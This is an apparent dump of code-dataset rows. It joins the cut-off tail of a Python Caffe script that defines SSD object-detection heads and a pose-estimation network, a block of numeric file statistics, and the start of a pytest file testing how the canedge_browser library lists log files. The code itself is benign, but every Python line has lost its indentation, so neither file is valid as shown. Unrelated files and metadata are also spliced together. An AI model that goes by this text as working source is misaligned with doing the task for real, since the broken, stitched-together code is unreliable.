net[name] = L.Concat(*det_out_layers, axis=2)
net.det_accu = L.DetEval(net[name], net[gt_label], \
detection_evaluate_param=det_eval_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
else:
net.det_accu = L.DetEval(net['detection_out_1'], net[gt_label], \
detection_evaluate_param=det_eval_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
###pose
pose_test_kwargs={
# nms
'nms_threshold': 0.05,
'nms_max_peaks': 500,
'nms_num_parts': 18,
# connect
'conn_is_type_coco': True,
'conn_max_person': 10,
'conn_max_peaks_use': 20,
'conn_iters_pa_cal': 10,
'conn_connect_inter_threshold': 0.05,
'conn_connect_inter_min_nums': 8,
'conn_connect_min_subset_cnt': 3,
'conn_connect_min_subset_score': 0.4,
# visual
'eval_area_thre': 64*64,
'eval_oks_thre': [0.5,0.55,0.6,0.65,0.7,0.75,0.8,0.85,0.9],
}
print net.keys()
if train:
net_base = None
net_stage = None
net= mPoseNet_COCO_ShuffleVariant_PoseFromReconBase_Train(net, data_layer="data"+pose_string, label_layer="label"+pose_string, train=True, **pose_test_kwargs)
else:
net = mPoseNet_COCO_ShuffleVariant_PoseFromReconBase_Train(net, data_layer="data"+pose_string, label_layer="label"+pose_string, train=False, **pose_test_kwargs)
print net.keys()
return net
def DAPPoseNet(net, train=True, data_layer="data", gt_label="label",net_width=512, net_height=288):
# BaseNet
channels = ((32,), (32,), (64, 32, 128), (128, 64, 128, 64, 256), (256, 128, 256, 128, 256))
strides = (True, True, True, False, False)
kernels = ((3,), (3,), (3, 1, 3), (3, 1, 3, 1, 3), (3, 1, 3, 1, 3))
pool_last = (False,False,False,True,True)
net = VGG16_BaseNet_ChangeChannel(net, from_layer=data_layer, channels=channels, strides=strides,
kernels=kernels,freeze_layers=[], pool_last=pool_last,flag_withparamname=True,)
net = VGG16_BaseNet_ChangeChannel(net, from_layer=data_layer + pose_string, channels=channels, strides=strides,
kernels=kernels, freeze_layers=[], pool_last=pool_last, flag_withparamname=True, pose_string = pose_string)
conv6_output = Conv6_Param.get('conv6_output', [])
conv6_kernal_size = Conv6_Param.get('conv6_kernal_size', [])
out_layer = "pool5"
net = addconv6(net, from_layer=out_layer, use_bn=True, conv6_output=conv6_output, \
conv6_kernal_size=conv6_kernal_size, pre_name="conv6", start_pool=False, lr_mult=1, decay_mult=1,
n_group=1)
# Create SSD Header for SSD1
lr_mult = 1
decay_mult = 1.0
mbox_1_layers = SsdDetectorHeaders(net, \
net_width=net_width, net_height=net_height, data_layer=data_layer, \
from_layers=ssd_Param_1.get('feature_layers',[]), \
num_classes=ssd_Param_1.get("num_classes",2), \
boxsizes=ssd_Param_1.get("anchor_boxsizes", []), \
aspect_ratios=ssd_Param_1.get("anchor_aspect_ratios",[]), \
prior_variance = ssd_Param_1.get("anchor_prior_variance",[0.1,0.1,0.2,0.2]), \
flip=ssd_Param_1.get("anchor_flip",True), \
clip=ssd_Param_1.get("anchor_clip",True), \
normalizations=ssd_Param_1.get("interlayers_normalizations",[]), \
use_batchnorm=ssd_Param_1.get("interlayers_use_batchnorm",True), \
inter_layer_channels=ssd_Param_1.get("interlayers_channels_kernels",[]), \
use_focus_loss=ssd_Param_1.get("bboxloss_using_focus_loss",False), \
use_dense_boxes=ssd_Param_1.get('bboxloss_use_dense_boxes',False), \
stage=1,lr_mult=lr_mult, decay_mult=decay_mult)
# make Loss or Detout for SSD1
if train:
loss_param = get_loss_param(normalization=ssd_Param_1.get("bboxloss_normalization",P.Loss.VALID))
mbox_1_layers.append(net[gt_label])
use_dense_boxes = ssd_Param_1.get('bboxloss_use_dense_boxes',False)
if use_dense_boxes:
bboxloss_param = {
'gt_labels': ssd_Param_1.get('gt_labels',[]),
'target_labels': ssd_Param_1.get('target_labels',[]),
'num_classes':ssd_Param_1.get("num_classes",2),
'alias_id':ssd_Param_1.get("alias_id",0),
'loc_loss_type':ssd_Param_1.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
'conf_loss_type':ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.LOGISTIC),
'loc_weight':ssd_Param_1.get("bboxloss_loc_weight",1),
'conf_weight':ssd_Param_1.get("bboxloss_conf_weight",1),
'overlap_threshold':ssd_Param_1.get("bboxloss_overlap_threshold",0.5),
'neg_overlap':ssd_Param_1.get("bboxloss_neg_overlap",0.5),
'size_threshold':ssd_Param_1.get("bboxloss_size_threshold",0.0001),
'do_neg_mining':ssd_Param_1.get("bboxloss_do_neg_mining",True),
'neg_pos_ratio':ssd_Param_1.get("bboxloss_neg_pos_ratio",3),
'using_focus_loss':ssd_Param_1.get("bboxloss_using_focus_loss",False),
'gama':ssd_Param_1.get("bboxloss_focus_gama",2),
'use_difficult_gt':ssd_Param_1.get("bboxloss_use_difficult_gt",False),
'code_type':ssd_Param_1.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
'use_prior_for_matching':True,
'encode_variance_in_target': False,
'flag_noperson':ssd_Param_1.get('flag_noperson',False),
}
net["mbox_1_loss"] = L.DenseBBoxLoss(*mbox_1_layers, dense_bbox_loss_param=bboxloss_param, \
loss_param=loss_param, include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
propagate_down=[True, True, False, False])
else:
bboxloss_param = {
'gt_labels': ssd_Param_1.get('gt_labels',[]),
'target_labels': ssd_Param_1.get('target_labels',[]),
'num_classes':ssd_Param_1.get("num_classes",2),
'alias_id':ssd_Param_1.get("alias_id",0),
'loc_loss_type':ssd_Param_1.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
'conf_loss_type':ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX),
'loc_weight':ssd_Param_1.get("bboxloss_loc_weight",1),
'conf_weight':ssd_Param_1.get("bboxloss_conf_weight",1),
'overlap_threshold':ssd_Param_1.get("bboxloss_overlap_threshold",0.5),
'neg_overlap':ssd_Param_1.get("bboxloss_neg_overlap",0.5),
'size_threshold':ssd_Param_1.get("bboxloss_size_threshold",0.0001),
'do_neg_mining':ssd_Param_1.get("bboxloss_do_neg_mining",True),
'neg_pos_ratio':ssd_Param_1.get("bboxloss_neg_pos_ratio",3),
'using_focus_loss':ssd_Param_1.get("bboxloss_using_focus_loss",False),
'gama':ssd_Param_1.get("bboxloss_focus_gama",2),
'use_difficult_gt':ssd_Param_1.get("bboxloss_use_difficult_gt",False),
'code_type':ssd_Param_1.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
'match_type':P.MultiBoxLoss.PER_PREDICTION,
'share_location':True,
'use_prior_for_matching':True,
'background_label_id':0,
'encode_variance_in_target': False,
'map_object_to_agnostic':False,
}
net["mbox_1_loss"] = L.BBoxLoss(*mbox_1_layers, bbox_loss_param=bboxloss_param, \
loss_param=loss_param,include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
propagate_down=[True, True, False, False])
else:
if ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.SOFTMAX:
reshape_name = "mbox_1_conf_reshape"
net[reshape_name] = L.Reshape(mbox_1_layers[1], \
shape=dict(dim=[0, -1, ssd_Param_1.get("num_classes",2)]))
softmax_name = "mbox_1_conf_softmax"
net[softmax_name] = L.Softmax(net[reshape_name], axis=2)
flatten_name = "mbox_1_conf_flatten"
net[flatten_name] = L.Flatten(net[softmax_name], axis=1)
mbox_1_layers[1] = net[flatten_name]
elif ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.LOGISTIC:
sigmoid_name = "mbox_1_conf_sigmoid"
net[sigmoid_name] = L.Sigmoid(mbox_1_layers[1])
mbox_1_layers[1] = net[sigmoid_name]
else:
raise ValueError("Unknown conf loss type.")
# Det-out param
det_out_param = {
'num_classes':ssd_Param_1.get("num_classes",2),
'target_labels': ssd_Param_1.get('detout_target_labels',[]),
'alias_id':ssd_Param_1.get("alias_id",0),
'conf_threshold':ssd_Param_1.get("detout_conf_threshold",0.01),
'nms_threshold':ssd_Param_1.get("detout_nms_threshold",0.45),
'size_threshold':ssd_Param_1.get("detout_size_threshold",0.0001),
'top_k':ssd_Param_1.get("detout_top_k",30),
'share_location':True,
'code_type':P.PriorBox.CENTER_SIZE,
'background_label_id':0,
'variance_encoded_in_target':False,
}
use_dense_boxes = ssd_Param_1.get('bboxloss_use_dense_boxes',False)
if use_dense_boxes:
net.detection_out_1 = L.DenseDetOut(*mbox_1_layers, \
detection_output_param=det_out_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
else:
net.detection_out_1 = L.DetOut(*mbox_1_layers, \
detection_output_param=det_out_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
# make Loss & Detout for SSD2
lr_mult = 1.0
decay_mult = 1.0
if use_ssd2_for_detection:
mbox_2_layers = SsdDetectorHeaders(net, \
net_width=net_width, net_height=net_height, data_layer=data_layer, \
from_layers=ssd_Param_2.get('feature_layers',[]), \
num_classes=ssd_Param_2.get("num_classes",2), \
boxsizes=ssd_Param_2.get("anchor_boxsizes", []), \
aspect_ratios=ssd_Param_2.get("anchor_aspect_ratios",[]), \
prior_variance = ssd_Param_2.get("anchor_prior_variance",[0.1,0.1,0.2,0.2]), \
flip=ssd_Param_2.get("anchor_flip",True), \
clip=ssd_Param_2.get("anchor_clip",True), \
normalizations=ssd_Param_2.get("interlayers_normalizations",[]), \
use_batchnorm=ssd_Param_2.get("interlayers_use_batchnorm",True), \
inter_layer_channels=ssd_Param_2.get("interlayers_channels_kernels",[]), \
use_focus_loss=ssd_Param_2.get("bboxloss_using_focus_loss",False), \
use_dense_boxes=ssd_Param_2.get('bboxloss_use_dense_boxes',False), \
stage=2,lr_mult=lr_mult, decay_mult=decay_mult)
# make Loss or Detout for SSD1
if train:
loss_param = get_loss_param(normalization=ssd_Param_2.get("bboxloss_normalization",P.Loss.VALID))
mbox_2_layers.append(net[gt_label])
use_dense_boxes = ssd_Param_2.get('bboxloss_use_dense_boxes',False)
if use_dense_boxes:
bboxloss_param = {
'gt_labels': ssd_Param_2.get('gt_labels',[]),
'target_labels': ssd_Param_2.get('target_labels',[]),
'num_classes':ssd_Param_2.get("num_classes",2),
'alias_id':ssd_Param_2.get("alias_id",0),
'loc_loss_type':ssd_Param_2.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
'conf_loss_type':ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.LOGISTIC),
'loc_weight':ssd_Param_2.get("bboxloss_loc_weight",1),
'conf_weight':ssd_Param_2.get("bboxloss_conf_weight",1),
'overlap_threshold':ssd_Param_2.get("bboxloss_overlap_threshold",0.5),
'neg_overlap':ssd_Param_2.get("bboxloss_neg_overlap",0.5),
'size_threshold':ssd_Param_2.get("bboxloss_size_threshold",0.0001),
'do_neg_mining':ssd_Param_2.get("bboxloss_do_neg_mining",True),
'neg_pos_ratio':ssd_Param_2.get("bboxloss_neg_pos_ratio",3),
'using_focus_loss':ssd_Param_2.get("bboxloss_using_focus_loss",False),
'gama':ssd_Param_2.get("bboxloss_focus_gama",2),
'use_difficult_gt':ssd_Param_2.get("bboxloss_use_difficult_gt",False),
'code_type':ssd_Param_2.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
'use_prior_for_matching':True,
'encode_variance_in_target': False,
'flag_noperson': ssd_Param_2.get('flag_noperson', False),
}
net["mbox_2_loss"] = L.DenseBBoxLoss(*mbox_2_layers, dense_bbox_loss_param=bboxloss_param, \
loss_param=loss_param, include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
propagate_down=[True, True, False, False])
else:
bboxloss_param = {
'gt_labels': ssd_Param_2.get('gt_labels',[]),
'target_labels': ssd_Param_2.get('target_labels',[]),
'num_classes':ssd_Param_2.get("num_classes",2),
'alias_id':ssd_Param_2.get("alias_id",0),
'loc_loss_type':ssd_Param_2.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
'conf_loss_type':ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX),
'loc_weight':ssd_Param_2.get("bboxloss_loc_weight",1),
'conf_weight':ssd_Param_2.get("bboxloss_conf_weight",1),
'overlap_threshold':ssd_Param_2.get("bboxloss_overlap_threshold",0.5),
'neg_overlap':ssd_Param_2.get("bboxloss_neg_overlap",0.5),
'size_threshold':ssd_Param_2.get("bboxloss_size_threshold",0.0001),
'do_neg_mining':ssd_Param_2.get("bboxloss_do_neg_mining",True),
'neg_pos_ratio':ssd_Param_2.get("bboxloss_neg_pos_ratio",3),
'using_focus_loss':ssd_Param_2.get("bboxloss_using_focus_loss",False),
'gama':ssd_Param_2.get("bboxloss_focus_gama",2),
'use_difficult_gt':ssd_Param_2.get("bboxloss_use_difficult_gt",False),
'code_type':ssd_Param_2.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
'match_type':P.MultiBoxLoss.PER_PREDICTION,
'share_location':True,
'use_prior_for_matching':True,
'background_label_id':0,
'encode_variance_in_target': False,
'map_object_to_agnostic':False,
}
net["mbox_2_loss"] = L.BBoxLoss(*mbox_2_layers, bbox_loss_param=bboxloss_param, \
loss_param=loss_param,include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
propagate_down=[True, True, False, False])
else:
if ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.SOFTMAX:
reshape_name = "mbox_2_conf_reshape"
net[reshape_name] = L.Reshape(mbox_2_layers[1], \
shape=dict(dim=[0, -1, ssd_Param_2.get("num_classes",2)]))
softmax_name = "mbox_2_conf_softmax"
net[softmax_name] = L.Softmax(net[reshape_name], axis=2)
flatten_name = "mbox_2_conf_flatten"
net[flatten_name] = L.Flatten(net[softmax_name], axis=1)
mbox_2_layers[1] = net[flatten_name]
elif ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.LOGISTIC:
sigmoid_name = "mbox_2_conf_sigmoid"
net[sigmoid_name] = L.Sigmoid(mbox_2_layers[1])
mbox_2_layers[1] = net[sigmoid_name]
else:
raise ValueError("Unknown conf loss type.")
# Det-out param
det_out_param = {
'num_classes':ssd_Param_2.get("num_classes",2),
'target_labels': ssd_Param_2.get('detout_target_labels',[]),
'alias_id':ssd_Param_2.get("alias_id",0),
'conf_threshold':ssd_Param_2.get("detout_conf_threshold",0.01),
'nms_threshold':ssd_Param_2.get("detout_nms_threshold",0.45),
'size_threshold':ssd_Param_2.get("detout_size_threshold",0.0001),
'top_k':ssd_Param_2.get("detout_top_k",30),
'share_location':True,
'code_type':P.PriorBox.CENTER_SIZE,
'background_label_id':0,
'variance_encoded_in_target':False,
}
use_dense_boxes = ssd_Param_2.get('bboxloss_use_dense_boxes',False)
if use_dense_boxes:
net.detection_out_2 = L.DenseDetOut(*mbox_2_layers, \
detection_output_param=det_out_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
else:
net.detection_out_2 = L.DetOut(*mbox_2_layers, \
detection_output_param=det_out_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
# EVAL in TEST MODE
if not train:
det_eval_param = {
'gt_labels': eval_Param.get('eval_gt_labels',[]),
'num_classes':eval_Param.get("eval_num_classes",2),
'evaluate_difficult_gt':eval_Param.get("eval_difficult_gt",False),
'boxsize_threshold':eval_Param.get("eval_boxsize_threshold",[0,0.01,0.05,0.1,0.15,0.2,0.25]),
'iou_threshold':eval_Param.get("eval_iou_threshold",[0.9,0.75,0.5]),
'background_label_id':0,
}
if use_ssd2_for_detection:
det_out_layers = []
det_out_layers.append(net['detection_out_1'])
det_out_layers.append(net['detection_out_2'])
name = 'det_out'
net[name] = L.Concat(*det_out_layers, axis=2)
net.det_accu = L.DetEval(net[name], net[gt_label], \
detection_evaluate_param=det_eval_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
else:
net.det_accu = L.DetEval(net['detection_out_1'], net[gt_label], \
detection_evaluate_param=det_eval_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
if train:
net.vec_mask, net.heat_mask, net.vec_temp, net.heat_temp = \
L.Slice(net["label"+pose_string], ntop=4, slice_param=dict(slice_point=[34, 52, 86], axis=1))
else:
net.vec_mask, net.heat_mask, net.vec_temp, net.heat_temp, net.gt = \
L.Slice(net["label"+pose_string], ntop=5, slice_param=dict(slice_point=[34, 52, 86, 104], axis=1))
# label
net.vec_label = L.Eltwise(net.vec_mask, net.vec_temp, eltwise_param=dict(operation=P.Eltwise.PROD))
net.heat_label = L.Eltwise(net.heat_mask, net.heat_temp, eltwise_param=dict(operation=P.Eltwise.PROD))
###pose
pose_test_kwargs={
# nms
'nms_threshold': 0.05,
'nms_max_peaks': 500,
'nms_num_parts': 18,
# connect
'conn_is_type_coco': True,
'conn_max_person': 10,
'conn_max_peaks_use': 20,
'conn_iters_pa_cal': 10,
'conn_connect_inter_threshold': 0.05,
'conn_connect_inter_min_nums': 8,
'conn_connect_min_subset_cnt': 3,
'conn_connect_min_subset_score': 0.4,
# visual
'eval_area_thre': 64*64,
'eval_oks_thre': [0.5,0.55,0.6,0.65,0.7,0.75,0.8,0.85,0.9],
}
bn_kwargs = {
'param': [dict(lr_mult=0, decay_mult=0), dict(lr_mult=0, decay_mult=0), dict(lr_mult=0, decay_mult=0)],
'eps': 0.001,
}
sb_kwargs = {
'bias_term': True,
'param': [dict(lr_mult=1, decay_mult=0), dict(lr_mult=1, decay_mult=0)],
'filler': dict(type='constant', value=1.0),
'bias_filler': dict(type='constant', value=0.2),
}
deconv_param = {
'num_output': 128,
'kernel_size': 2,
'pad': 0,
'stride': 2,
'weight_filler': dict(type='gaussian', std=0.01),
'bias_filler': dict(type='constant', value=0),
'group': 1,
}
kwargs_deconv = {
'param': [dict(lr_mult=1, decay_mult=1)],
'convolution_param': deconv_param
}
from_layer = "conv5_5" + pose_string
add_layer = from_layer + "_deconv"
net[add_layer] = L.Deconvolution(net[from_layer], **kwargs_deconv)
bn_name = add_layer + '_bn'
net[bn_name] = L.BatchNorm(net[add_layer], in_place=True, **bn_kwargs)
sb_name = add_layer + '_scale'
net[sb_name] = L.Scale(net[add_layer], in_place=True, **sb_kwargs)
relu_name = add_layer + '_relu'
net[relu_name] = L.ReLU(net[add_layer], in_place=True)
baselayer = add_layer
use_stage = 3
use_3_layers = 5
use_1_layers = 0
n_channel = 64
lrdecay = 1.0
kernel_size = 3
flag_output_sigmoid = False
for stage in xrange(use_stage):
if stage == 0:
from_layer = baselayer
else:
from_layer = "concat_stage{}".format(stage)
outlayer = "concat_stage{}".format(stage + 1)
if stage == use_stage - 1:
short_cut = False
else:
short_cut = True
net = mPose_StageX_Train(net, from_layer=from_layer, out_layer=outlayer, stage=stage + 1,
mask_vec="vec_mask", mask_heat="heat_mask", \
label_vec="vec_label", label_heat="heat_label", \
use_3_layers=use_3_layers, use_1_layers=use_1_layers, short_cut=short_cut, \
base_layer=baselayer, lr=0.1, decay=lrdecay, num_channels=n_channel,
kernel_size=kernel_size, flag_sigmoid=flag_output_sigmoid)
# for Test
if not train:
if flag_output_sigmoid:
conv_vec = "stage{}_conv{}_vec".format(use_stage, use_3_layers + use_1_layers) + "_sig"
conv_heat = "stage{}_conv{}_heat".format(use_stage, use_3_layers + use_1_layers) + "_sig"
else:
conv_vec = "stage{}_conv{}_vec".format(use_stage, use_3_layers + use_1_layers)
conv_heat = "stage{}_conv{}_heat".format(use_stage, use_3_layers + use_1_layers)
net.vec_out = L.Eltwise(net.vec_mask, net[conv_vec], eltwise_param=dict(operation=P.Eltwise.PROD))
net.heat_out = L.Eltwise(net.heat_mask, net[conv_heat], eltwise_param=dict(operation=P.Eltwise.PROD))
feaLayers = []
feaLayers.append(net.heat_out)
feaLayers.append(net.vec_out)
outlayer = "concat_stage{}".format(3)
net[outlayer] = L.Concat(*feaLayers, axis=1)
# Resize
resize_kwargs = {
'factor': pose_test_kwargs.get("resize_factor", 8),
'scale_gap': pose_test_kwargs.get("resize_scale_gap", 0.3),
'start_scale': pose_test_kwargs.get("resize_start_scale", 1.0),
}
net.resized_map = L.ImResize(net[outlayer], name="resize", imresize_param=resize_kwargs)
# Nms
nms_kwargs = {
'threshold': pose_test_kwargs.get("nms_threshold", 0.05),
'max_peaks': pose_test_kwargs.get("nms_max_peaks", 100),
'num_parts': pose_test_kwargs.get("nms_num_parts", 18),
}
net.joints = L.Nms(net.resized_map, name="nms", nms_param=nms_kwargs)
# ConnectLimbs
connect_kwargs = {
'is_type_coco': pose_test_kwargs.get("conn_is_type_coco", True),
'max_person': pose_test_kwargs.get("conn_max_person", 10),
'max_peaks_use': pose_test_kwargs.get("conn_max_peaks_use", 20),
'iters_pa_cal': pose_test_kwargs.get("conn_iters_pa_cal", 10),
'connect_inter_threshold': pose_test_kwargs.get("conn_connect_inter_threshold", 0.05),
'connect_inter_min_nums': pose_test_kwargs.get("conn_connect_inter_min_nums", 8),
'connect_min_subset_cnt': pose_test_kwargs.get("conn_connect_min_subset_cnt", 3),
'connect_min_subset_score': pose_test_kwargs.get("conn_connect_min_subset_score", 0.4),
}
net.limbs = L.Connectlimb(net.resized_map, net.joints, connect_limb_param=connect_kwargs)
# Eval
eval_kwargs = {
'stride': 8,
'area_thre': pose_test_kwargs.get("eval_area_thre", 64 * 64),
'oks_thre': pose_test_kwargs.get("eval_oks_thre", [0.5, 0.55, 0.6, 0.65, 0.7, 0.75, 0.8, 0.85, 0.9]),
}
net.eval = L.PoseEval(net.limbs, net.gt, pose_eval_param=eval_kwargs)
return net
| 57.870249
| 178
| 0.62104
| 5,843
| 44,155
| 4.277597
| 0.057162
| 0.076818
| 0.04321
| 0.057614
| 0.883252
| 0.869969
| 0.858326
| 0.844643
| 0.83336
| 0.823198
| 0
| 0.032391
| 0.251863
| 44,155
| 763
| 179
| 57.870249
| 0.724224
| 0.013339
| 0
| 0.751043
| 0
| 0
| 0.233096
| 0.087713
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.026426
| null | null | 0.002782
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
624119ae0cf70022bfe2ed0e3a69eca111c16835
| 17,706
|
py
|
Python
|
tests/test_list_folders.py
|
fourniernicolas/canedge_browser
|
c35b0445692257ee574976624b8d1a615b4d6eac
|
[
"MIT"
] | null | null | null |
tests/test_list_folders.py
|
fourniernicolas/canedge_browser
|
c35b0445692257ee574976624b8d1a615b4d6eac
|
[
"MIT"
] | null | null | null |
tests/test_list_folders.py
|
fourniernicolas/canedge_browser
|
c35b0445692257ee574976624b8d1a615b4d6eac
|
[
"MIT"
] | null | null | null |
import canedge_browser
import pytest
from datetime import datetime, timezone
from fsspec import AbstractFileSystem
from pathlib import Path
class TestListLogFiles(object):
@pytest.fixture()
def fs(self) -> AbstractFileSystem:
# Use the files already present in the examples section for testing.
test_data_path = Path(__file__).parent.parent / "examples" / "LOG"
fs = canedge_browser.LocalFileSystem(base_path=test_data_path)
return fs
def test_get_log_files_with_no_filesystem(self):
"""Sending invalid input should raise an exception.
"""
fs = None
devices = "AABBCCDD"
with pytest.raises(ValueError):
canedge_browser.get_log_files(fs, devices)
return
def test_get_log_files_with_invalid_filesystem(self):
"""Sending invalid input should raise an exception.
"""
class InvalidFileSystem(object):
pass
fs = InvalidFileSystem()
devices = "AABBCCDD"
with pytest.raises(TypeError):
canedge_browser.get_log_files(fs, devices)
return
def test_get_log_files_with_no_devices(self, fs):
"""Sending invalid input should raise an exception.
"""
devices = None
with pytest.raises(TypeError):
canedge_browser.get_log_files(fs, devices)
return
def test_get_log_files_with_invalid_device(self, fs):
"""With a invalid/non-existing device name, ensure that no exceptions are thrown but merely an empty set of
results is received.
"""
devices = "abcdefghijkl"
result = canedge_browser.get_log_files(fs, devices)
assert len(result) == 0
return
def test_get_log_files_single_device_as_str(self, fs):
"""With a single valid device passed as a string, ensure that the expected log files are returned.
"""
devices = "EEEE0001"
expected_files = {
"/EEEE0001/00000001/00000001.MF4",
"/EEEE0001/00000001/00000002.MF4",
"/EEEE0001/00000001/00000003.MF4",
"/EEEE0001/00000001/00000004.MF4",
"/EEEE0001/00000001/00000005.MF4",
"/EEEE0001/00000001/00000006.MF4",
"/EEEE0001/00000001/00000007.MF4",
"/EEEE0001/00000001/00000008.MF4",
"/EEEE0001/00000001/00000009.MF4",
"/EEEE0001/00000002/00000257.MF4",
"/EEEE0001/00000003/00000513.MF4",
"/EEEE0001/00000004/00000769.MF4",
"/EEEE0001/00000005/00001025.MF4",
}
result = canedge_browser.get_log_files(fs, devices)
assert set(result) == expected_files
return
def test_get_log_files_single_device_as_list(self, fs):
"""With a single valid device passed as a list, ensure that the expected log files are returned.
"""
devices = ["EEEE0001"]
expected_files = {
"/EEEE0001/00000001/00000001.MF4",
"/EEEE0001/00000001/00000002.MF4",
"/EEEE0001/00000001/00000003.MF4",
"/EEEE0001/00000001/00000004.MF4",
"/EEEE0001/00000001/00000005.MF4",
"/EEEE0001/00000001/00000006.MF4",
"/EEEE0001/00000001/00000007.MF4",
"/EEEE0001/00000001/00000008.MF4",
"/EEEE0001/00000001/00000009.MF4",
"/EEEE0001/00000002/00000257.MF4",
"/EEEE0001/00000003/00000513.MF4",
"/EEEE0001/00000004/00000769.MF4",
"/EEEE0001/00000005/00001025.MF4",
}
result = canedge_browser.get_log_files(fs, devices)
assert set(result) == expected_files
return
def test_get_log_files_with_custom_extension(self, fs):
"""Attempt to use a non-default extension. Test for both upper- and lower-case variants.
"""
devices = ["EEEE0001"]
expected_files = {
"/EEEE0001/00000001/ignore.me",
}
result_a = canedge_browser.get_log_files(fs, devices, file_extensions=["me"])
result_b = canedge_browser.get_log_files(fs, devices, file_extensions=["ME"])
assert expected_files == set(result_a)
assert expected_files == set(result_b)
return
def test_get_log_files_with_multiple_extensions(self, fs):
"""Attempt to use a set of extensions.
"""
devices = ["EEEE0001"]
expected_files = {
"/EEEE0001/00000001/00000001.MF4",
"/EEEE0001/00000001/00000002.MF4",
"/EEEE0001/00000001/00000003.MF4",
"/EEEE0001/00000001/00000004.MF4",
"/EEEE0001/00000001/00000005.MF4",
"/EEEE0001/00000001/00000006.MF4",
"/EEEE0001/00000001/00000007.MF4",
"/EEEE0001/00000001/00000008.MF4",
"/EEEE0001/00000001/00000009.MF4",
"/EEEE0001/00000002/00000257.MF4",
"/EEEE0001/00000003/00000513.MF4",
"/EEEE0001/00000004/00000769.MF4",
"/EEEE0001/00000005/00001025.MF4",
"/EEEE0001/00000001/ignore.me",
}
result = canedge_browser.get_log_files(fs, devices, file_extensions=["me", "MF4"])
assert set(result) == expected_files
return
def test_get_log_files_with_multiple_devices(self, fs):
"""Use a device list with multiple devices.
"""
devices = [
"EEEE0001",
"EEEE0002",
]
expected_files = {
"/EEEE0001/00000001/00000001.MF4",
"/EEEE0001/00000001/00000002.MF4",
"/EEEE0001/00000001/00000003.MF4",
"/EEEE0001/00000001/00000004.MF4",
"/EEEE0001/00000001/00000005.MF4",
"/EEEE0001/00000001/00000006.MF4",
"/EEEE0001/00000001/00000007.MF4",
"/EEEE0001/00000001/00000008.MF4",
"/EEEE0001/00000001/00000009.MF4",
"/EEEE0001/00000002/00000257.MF4",
"/EEEE0001/00000003/00000513.MF4",
"/EEEE0001/00000004/00000769.MF4",
"/EEEE0001/00000005/00001025.MF4",
'/EEEE0002/00000001/00000001.MF4',
}
result = canedge_browser.get_log_files(fs, devices)
assert set(result) == expected_files
return
def test_get_log_files_with_multiple_devices_and_non_existing_devices(self, fs):
"""Use a device list with multiple devices, some of which are not present. Should only show the files for the
devices present.
"""
devices = [
"EEEE0011",
"EEEE0001",
"EEEE0002",
"EEEE0012",
]
expected_files = {
"/EEEE0001/00000001/00000001.MF4",
"/EEEE0001/00000001/00000002.MF4",
"/EEEE0001/00000001/00000003.MF4",
"/EEEE0001/00000001/00000004.MF4",
"/EEEE0001/00000001/00000005.MF4",
"/EEEE0001/00000001/00000006.MF4",
"/EEEE0001/00000001/00000007.MF4",
"/EEEE0001/00000001/00000008.MF4",
"/EEEE0001/00000001/00000009.MF4",
"/EEEE0001/00000002/00000257.MF4",
"/EEEE0001/00000003/00000513.MF4",
"/EEEE0001/00000004/00000769.MF4",
"/EEEE0001/00000005/00001025.MF4",
'/EEEE0002/00000001/00000001.MF4',
}
result = canedge_browser.get_log_files(fs, devices)
assert set(result) == expected_files
return
def test_get_log_files_with_start_date(self, fs):
"""Test all files are returned when the start date is outside the range.
"""
devices = ["EEEE0001"]
start_date = datetime(year=2020, month=1, day=5, hour=10, tzinfo=timezone.utc)
expected_files = {
"/EEEE0001/00000001/00000001.MF4",
"/EEEE0001/00000001/00000002.MF4",
"/EEEE0001/00000001/00000003.MF4",
"/EEEE0001/00000001/00000004.MF4",
"/EEEE0001/00000001/00000005.MF4",
"/EEEE0001/00000001/00000006.MF4",
"/EEEE0001/00000001/00000007.MF4",
"/EEEE0001/00000001/00000008.MF4",
"/EEEE0001/00000001/00000009.MF4",
"/EEEE0001/00000002/00000257.MF4",
"/EEEE0001/00000003/00000513.MF4",
"/EEEE0001/00000004/00000769.MF4",
"/EEEE0001/00000005/00001025.MF4",
}
result = canedge_browser.get_log_files(fs, devices, start_date=start_date)
assert set(result) == expected_files
return
def test_get_log_files_with_start_date_limiting_a(self, fs):
"""Test only a subset of files are returned when the start date is inside the range.
"""
devices = ["EEEE0001"]
